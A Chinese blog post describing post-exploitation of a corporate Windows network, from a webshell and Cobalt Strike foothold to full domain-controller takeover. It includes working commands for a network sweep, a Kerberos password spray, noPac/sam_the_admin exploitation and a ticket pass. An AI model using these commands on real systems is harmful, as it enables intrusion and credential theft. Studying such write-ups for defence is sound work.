<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    某集團后滲透實戰

    一顆小胡椒2022-01-12 15:24:31

    前言

    某集團后滲透,接手的時候就感覺有域,一次利用域的新漏洞攻擊排坑之旅,簡單分享下思路~

    CS上線

    如圖所示,哥斯拉不能執行任何命令,需要繞過

    但是有些時候360會禁用cmd,但是像wmic這些命令是可以執行的,這個時候可以利用白名單的方式去上線CS

    c:\windows\system32\rundll32.exe c:\windows\system32\url.dll,FileProtocolHandler c:\xx.exe
    

    但是這里的情況是什么命令都不能執行了,所以尋找另外一種方法

    這里我猜測它是出網的,利用哥斯拉自帶的shellcodeLoader上線到CS,這個模塊在實戰下還是很好用的

    上線到CS上

    但是上線到CS之后也不能執行命令,看了一下特權

    getprivs或whoami /priv
    

    存在sedebug特權,這里可以直接getsystem提權

    這個時候不能直接執行命令,如果存在360,會被提示攔截,解決方法是注入到另一個system權限進程下去執行命令

    來了,這樣就可以執行命令了

    通過ip查詢在10段,可能存在大網段,并且及有可能存在域

    密碼dump

    導出administrator的密碼hash為xxx

    隧道代理

    這里直接上Stowaway,socks5代理上線

    信息收集

    利用hash在本網段先進行碰撞,無碰撞到有價值的東西

    繼續在本機進行信息收集,端口檢測情況

    基本上都是在10.10.168網段下,但是肯定能確定是個大網段,針對10段進行存活性探測

    使用腳本來進行網段存活掃描,找到了如下存活網段

    掃描

    找到了存活網段后,上fscan進行探測,掃了16段

    fscan.exe -h 10.0.0.0/16 -o 16.txt
    

    不出所料,果然有域,探測無zerologon,所以利用最新的sAMAccountName進行攻擊,但是該攻擊需要一個域內的賬號密碼,現在手頭沒有,打算打臺域機器,如果沒有再去爆破域賬號密碼

    域控IP

    10.0.9.10(輔域)10.0.9.9(主域)
    

    針對域控下的網段進行nbtscan掃描

    除DC外還存在另一臺域機器,而剛好這臺域機器存在sqlserver弱密碼

    sa P@ssw0rd
    

    激活xpcmdshell,利用powershell上線cs

    可以看到這臺機器在域內,并且是08,可以dump明文密碼

    先進行密碼dump以及進程探測,檢查是否域管登錄,如果域管登錄可以直接注入進程拿域控了

    并沒有找到域管進程或密碼,而且也沒有域內的賬號密碼,這里直接就進行域賬號爆破了

    利用已經攻陷的域內機器,net user /domain提取所有的用戶,保存為user.txt

    上傳kerbrute,并利用找到的sqlserver密碼P@ssw0rd進行噴灑

    kerbrute_windows_amd64.exe bruteuser -d xxx user.txt P@ssw0rd --dc 10.0.9.9
    

    成功找到兩個用戶的密碼,接下來利用noPac來進行攻擊

    noPac攻擊

    我直接利用sam_the_admin腳本是連接拒絕

    proxychains4 -q python3 sam_the_admin.py xxx/ricoh:P@ssw0rd -dc-ip 10.0.9.10 -shell
    

    換了另一個域控嘗試,結果如下

    這是這個腳本的一個坑,它說漏洞已經打了補丁,其實漏洞是存在的

    這里我換了noPac再一次嘗試,由于目前域內機器只有一臺,且該機器沒有.NET4,所以無法執行noPac,這里我給這個機器安裝了.NET4,之后就可以運行了

    noPac.exe -domain xxx -user spsadmin -pass P@ssw0rd /dc ad03.xxx /mAccount 1234 /mPassword 123456  /service cifs /ptt
    

    導入出現了問題,可能是NET的原因,直接用Rubeus.exe傳遞即可

    execute-assembly C:\Users\costin\Desktop\Rubeus.exe ptt /ticket:doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQsbCV...
    

    導入成功,訪問域控

    beacon> shell dir \\ad03.xxx\c$
    

    或者后面換成ldap使用mimikatz導出域控hash也可

    一鍵化

    一鍵化利用工具https://github.com/Ridter/noPac,這個可以直接拿下域控了,如下圖所示,是可以直接成功的

    proxychains4 -q python3 noPac.py xxx/ricoh:'P@ssw0rd' -dc-ip 10.0.9.10 -dc-host ad03 -shell --impersonate administrator -use-ldap
    

    總結

    實戰中sam_the_admin拉跨了,說漏洞已經打過補丁了,誤報是有的,另外noPac.exe限制還是蠻多的,需要域內的機器以及.NET4以上的環境,這個內網的其實還有很多坑沒寫出來,加固了很多地方。值得一提的是,這個域控存在360主動防御以及安全狗和defender

    網段
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    當我們將Maltego工具的環境工作準備好后,即可使用該工具對信息進行整理和分析了。本文介紹如何對網段地址進行整理和分析,以獲取相關的信息。
    netspy是一款快速探測內網可達網段工具當我們進入內網后想要擴大戰果,那我們可能首先想知道當前主機能通哪些內網段。netspy正是一款應用而生的小工具,體積較小,速度極快,支持跨平臺,支持多種協議探測,希望能幫到你!
    事例一 重要區域與非重要網絡在同一子網或網段 判定依據 網絡架構:應劃分不同的網絡區域,并按照方便管理和控制的原則為各網絡區域分配地址 整改措施 涉及資金類交易的支付類系統與辦公網劃分不同網段 面向互聯網提供服務的系統與內部系統劃分不同網段 不同級別的系統劃分不同網段 事例二 互聯網出口無任何訪問控制措施。
    ARP Request廣播報文到達交換機時,交換機無條件廣播,處于廣播域內的目標主機自然會聽到,發現這是對自己的召喚,于是通過單播將自己的MAC地址通過ARP Reply發給源主機。在問題描述中,并沒有網關IP的信息。所以源主機會通過ARP Request請求網關的MAC地址,當網關的ARP Reply到來時,源主機就得到了網關的MAC地址。很簡單,只要判斷:報文的目的MAC是否==myself。否則就是給職位1的。
    路由器能隔絕廣播,那要VLAN有什么用,既配置了VLAN又劃分在不同的網段是不是有些多余了?題主的意思是不要
    靶機練習-DC-5
    2022-10-14 13:52:21
    復現過程攻擊機:kali 192.168.11.143靶機:Linux IP自動獲取攻擊機與靶機都使用net網絡連接,在同一網段下環境配置:1、Vulhub下載靶機,并導入vmware2、網絡配置中選擇更改為橋接模式,橋接至kali所在網卡3、重啟虛擬機信息收集:先進行主機發現arp-scan -l. 在嘗試這幾個聊天框的時候發現CopyRight的年份一直在變化。F5刷新幾次,仍在刷新說明和上傳了留言無關,是其中的copyright自己在變化。返回路徑contactus,多次刷新,copyright并沒有發生變化。說明問題出在thankyou.php中。
    靶場地址:https://download.vulnhub.com/ted/Ted.7z靶場設置 使用VM打
    本文是一份全面的指南,解釋了如何使用nProbe Cento構建一個高效的100 Gbit NetFlow傳感器。旨在幫助大家充分利用NetFlow技術,以監控和分析高速網絡流量。當需要監控分布式網絡,了解流經上行鏈路或關鍵網段的網絡流量時,NetFlow等技術通常是最佳選擇。 nProbe Pro/Enterprise和nProbe Cento是軟件探針,可用于構建多功能傳感器,以多種
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类